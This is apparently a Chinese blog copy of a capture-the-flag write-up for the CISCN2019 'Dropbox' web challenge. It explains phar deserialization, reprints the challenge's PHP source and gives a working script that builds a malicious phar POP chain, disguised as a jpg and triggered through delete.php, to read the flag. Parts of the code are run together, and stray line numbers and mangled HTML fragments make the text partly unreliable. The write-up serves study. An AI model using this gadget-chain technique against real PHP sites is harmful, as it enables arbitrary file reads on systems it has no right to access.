[CISCN2019 华北赛区 Day1 Web1]Dropbox 1

[CISCN2019 华北赛区 Day1 Web1]Dropbox

一、知识点：信息搜集，Phar反序列化

• phar知识点分析

phar文件的结构主要分为四个部分：

• 1.stub

phar文件的表示，类似于gif文件的GIF89a，以 xxx为固定形式，前面内容可以变，点必须以__HALT__COMPILER();?>结尾。

• 2.a mainfest describing the contents

该部分是phar文件中被压缩的文件的一些信息，其中meta-data部分的信息会被序列化，即执行serialize()函数，而phar://就相当于对这部分的内容进行反序列化，此处也正是漏洞点所在。

• 3.the file contents

这部分存储的是文件的内容，在没有其它特殊要求的情况下，这里面的内容不做约束。

• 4.a signature for verifying Phar integrity

数字签名。放在最末。

• 使用前提条件

1、phar文件可上传
2、文件流操作函数如file_get_content()等要有可利用的魔法方法。
3、文件流参数可控,且phar://协议可用。

二、解题

首先信息收集发现在注册登录上传文件后可以进行任意文件下载：

抓包：

进行文件下载：

读取到文件信息;

class.php

error_reporting(0);
$dbaddr = "127.0.0.1";
$dbuser = "root";
$dbpass = "root";
$dbname = "dropbox";
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);

class User {
    public $db;

    public function __construct() {
        global $db;
        $this->db = $db;
    }

    public function user_exist($username) {
        $stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->store_result();
        $count = $stmt->num_rows;
        if ($count === 0) {
            return false;
        }
        return true;
    }

    public function add_user($username, $password) {
        if ($this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
        $stmt->bind_param("ss", $username, $password);
        $stmt->execute();
        return true;
    }

    public function verify_user($username, $password) {
        if (!$this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($expect);
        $stmt->fetch();
        if (isset($expect) && $expect === $password) {
            return true;
        }
        return false;
    }

    public function __destruct() {
        $this->db->close();
    }
}

class FileList {
    private $files;
    private $results;
    private $funcs;

    public function __construct($path) {
        $this->files = array();
        $this->results = array();
        $this->funcs = array();
        $filenames = scandir($path);

        $key = array_search(".", $filenames);
        unset($filenames[$key]);
        $key = array_search("..", $filenames);
        unset($filenames[$key]);

        foreach ($filenames as $filename) {
            $file = new File();
            $file->open($path . $filename);
            array_push($this->files, $file);
            $this->results[$file->name()] = array();
        }
    }

    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }

    public function __destruct() {
        $table = '
';$table.='';foreach($this->funcsas$func){$table.='';}$table.='';$table.='';foreach($this->resultsas$filename=>$result){$table.='';foreach($resultas$func=>$value){$table.='';}$table.='';$table.='';}echo$table;}}classFile{public$filename;publicfunctionopen($filename){$this->filename=$filename;if(file_exists($filename)&&!is_dir($filename)){returntrue;}else{returnfalse;}}publicfunctionname(){returnbasename($this->filename);}publicfunctionsize(){$size=filesize($this->filename);$units=array(' B',' KB',' MB',' GB',' TB');for($i=0;$size>=1024&&$i<4;$i++)$size/=1024;returnround($size,2).$units[$i];}publicfunctiondetele(){unlink($this->filename);}publicfunctionclose(){returnfile_get_contents($this->filename);}}?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
进行代代码审计发现存在file_get_contents()函数，可以构造pop链来利用。首先在User类中的__desturcut(),调用了close()方法，可以利用这点来调用File类的close()方法。但没有回显，但在FileList类处有__destruct()方法能进行回显，可以利用FileList类的__call()进行遍历files数组，并且对每一个变量执行一次$func函数，然后将结果存进$result中，调用File类的close()方法。
所以思路是：
User->destruct()=>FileList->call()=>File->close()=>FileList->__destruct()
然后触发点是在：
 delete.php: 

session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}

if (!isset($_POST['filename'])) {
    die();
}

include "class.php";

chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename)) {
    $file->detele();
    Header("Content-type: application/json");
    $response = array("success" => true, "error" => "");
    echo json_encode($response);
} else {
    Header("Content-type: application/json");
    $response = array("success" => false, "error" => "File not exist");
    echo json_encode($response);
}
?>

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
 
在new File()的类中调用了detele函数：
 
发现detele函数有unlink函数，可以触发pop链
 
 
编写代码生成phar文件：
 

class User {
    public $db;
}

class File {
    public $filename;
}
class FileList {
    private $files;
    private $results;
    private $funcs;

    public function __construct() {
        $file = new File();
        $file->filename = '/flag.txt';
        $this->files = array($file);
        $this->results = array();
        $this->funcs = array();
    }
}

@unlink("phar.phar");#删除phar.phar
$phar = new Phar("phar.phar"); //后缀名必须为phar

$phar->startBuffering();#提高性能，好像不必要

$phar->setStub(""); //设置stub

$o = new User();
$o->db = new FileList();

$phar->setMetadata($o); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
 
(注意：想要生成phar文件记得把php.ini中的phar.readonly选项设置为Off,否则将无法生成phar文件)
 
运行脚本生成文件phar.php
 
重命名为jpg格式上传文件抓包修改Content-Type为image/jpeg或其它图片格式：
 
 
利用删除触发：
 
 
参考博客：
 
https://blog.csdn.net/SHININGENDING/article/details/124368489


                    相关阅读:

                    
CV计算机视觉每日开源代码Paper with code速览-2023.11.3                            

Java Date类简介说明                            

【CGRect Objective-C语言】                            

Tomcat 启动闪退问题解决方法                            

电商（淘宝1688京东拼多多等）API接口服务：提升商业效率和用户体验的关键                            

postgresql 内核源码分析 btree索引插入分析，索引页面分裂流程，多举措进行并发优化，对异常进行保护处理                            

Web前端入门（十六）CSS三大特性                            

金融的本质是什么？                            

【面试经典150 | 栈】有效的括号                            

分析大疆官网根据ip自动跳转到指定域名                            

                    
                

                    原文地址：https://blog.csdn.net/plant1234/article/details/127133483
                

            

                

                    最新文章
                
                

                    
攻防演习之三天拿下官网站群                            

数据安全治理学习——前期安全规划和安全管理体系建设                            

企业安全 | 企业内一次钓鱼演练准备过程                            

内网渗透测试 | Kerberos协议及其部分攻击手法                            

0day的产生 | 不懂代码的"代码审计"                            

安装scrcpy-client模块av模块异常，环境问题解决方案                            

leetcode hot100【LeetCode 279. 完全平方数】java实现                            

OpenWrt下安装Mosquitto                            

AnatoMask论文汇总                            

【AI日记】24.11.01 LangChain、openai api和github copilot                            

                    
                
            

            

                

                    热门文章
                
                

                    
十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧！！！                            

奉劝各位学弟学妹们，该打造你的技术影响力了！                            

五年了，我在 CSDN 的两个一百万。                            

Java俄罗斯方块，老程序员花了一个周末，连接中学年代！                            

面试官都震惊，你这网络基础可以啊！                            

你真的会用百度吗？我不信 — 那些不为人知的搜索引擎语法                            

心情不好的时候，用 Python 画棵樱花树送给自己吧                            

通宵一晚做出来的一款类似CS的第一人称射击游戏Demo！原来做游戏也不是很难，连憨憨学妹都学会了！                            

13 万字 C 语言从入门到精通保姆级教程2021 年版                            

10行代码集2000张美女图，Python爬虫120例，再上征途                            

                    
                
            

        

          

            
              
' . htmlentities($func) . '
        
          
Opt
          

              
              

                  
                  
' . htmlentities($value) . '
            
              
. htmlentities($filename) . '">下载 / åˆ é™¤